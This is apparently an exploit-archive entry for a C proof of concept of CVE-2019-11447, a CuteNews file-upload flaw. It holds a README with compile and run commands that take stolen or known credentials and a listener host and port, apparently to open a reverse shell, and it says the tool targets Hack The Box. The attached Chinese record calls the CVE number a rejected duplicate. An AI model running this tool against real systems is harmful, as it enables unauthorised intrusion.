CVE-2019-11447 PoC — 编号重复

Source

https://github.com/ojo5/CVE-2019-11447.c

Associated Vulnerability

Title:编号重复 (CVE-2019-11447)
Description:CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。 “废弃”请勿使用此编号。原因：此编号与CNNVD-201110-126编号重复，所有使用CNNVD编号的用户请参考CNNVD-201110-126编号。为防止意外使用，此编号中的所有信息已删除。

Description

CVE-2019-11447 written in C

Readme

# CVE-2019-11447 PoC

## Overview
This C program is a proof-of-concept (PoC) for exploiting CVE-2019-11447, an arbitrary file upload vulnerability in CuteNews. This PoC is designed to be used on the Hack The Box platform.

### Usage
Compile the program using gcc:

```bash
gcc -o exploit exploit.c -lcurl
```

Run the compiled program with the following command-line arguments:

```bash
./poc_exploit -t TARGET -u USERNAME -p PASSWORD -lh LISTENER_IP -lp LISTENER_PORT -f FILENAME
```

#### Parameters
-t, --target : Target IP address or domain (required)
-u, --uname : Username (required)
-p, --passw : Password (required)
-lh, --lhost : Listener IP address (required)
-lp, --lport : Listener Port (default: 4444)
-f, --file : Filename for payload WITHOUT extension (default: payload)

#### Example
```bash
./poc_exploit -t example.com -u admin -p pass -lh 192.168.1.1 -lp 4444 -f mypayload
```

File Snapshot


 [4.0K]  /data/pocs/babfff293026cf4ea716fcb095305e3b7c200e80
├── [ 18K]  exploit
├── [5.3K]  exploit.c
├── [1.5K]  LICENSE
└── [ 896]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!